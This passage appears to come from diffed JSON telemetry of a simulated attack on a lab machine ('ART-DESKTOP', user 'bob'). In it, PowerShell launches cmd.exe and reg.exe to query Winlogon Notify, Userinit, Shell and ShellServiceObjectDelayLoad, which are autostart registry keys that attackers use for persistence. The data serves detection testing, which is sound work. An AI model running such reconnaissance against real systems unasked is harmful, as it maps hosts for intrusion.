"reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571311990000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "process", - "pid": 5520, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571312140000, - "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-0010F9B05001}" - }, - { - "event_type": "process", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571312140000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1860, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571312230000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312140000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312140000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312140000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - 
"image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312140000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312140000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" - }, - { - "command_line": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6328, - "ppid": 1860, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571312320000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001052B25001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": 
"C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" 
- }, - { - "event_type": "process", - "pid": 6328, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" - }, - { - "event_type": "process", - "pid": 1860, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571312300000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 524, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571312470000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 524, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 524, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 524, - "process_name": "cmd.exe", - 
"process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 524, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 524, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6052, - "ppid": 524, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571312560000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312460000, - "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312460000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - 
"image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "process", - "pid": 6052, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" - }, - { - "event_type": "process", - "pid": 524, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4072, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571312720000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4072, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4072, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 
131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4072, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4072, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4072, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312610000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" - }, - { - "command_line": "reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1980, - "ppid": 4072, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571312810000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - 
"image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1980, - "process_name": 
"reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "process", - "pid": 1980, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571312770000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D6B75001}" - }, - { - "event_type": "process", - "pid": 4072, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010E2B65001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4248, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571312980000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" - }, - { - "command_line": "reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5316, - "ppid": 4248, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571313060000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}", - "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 5316, - 
"process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571312920000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313090000, - 
"unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "process", - "pid": 5316, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00101EBA5001}" - }, - { - "event_type": "process", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-00102AB95001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7264, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571313220000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": 
"C:\\Windows\\System32\\cmd.exe", - "pid": 7264, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313090000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7264, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7264, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7264, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7264, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571313240000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001072BB5001}" - }, - { - "command_line": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1448, - "ppid": 7264, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883571313340000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-001068BC5001}", - "unique_ppid": 
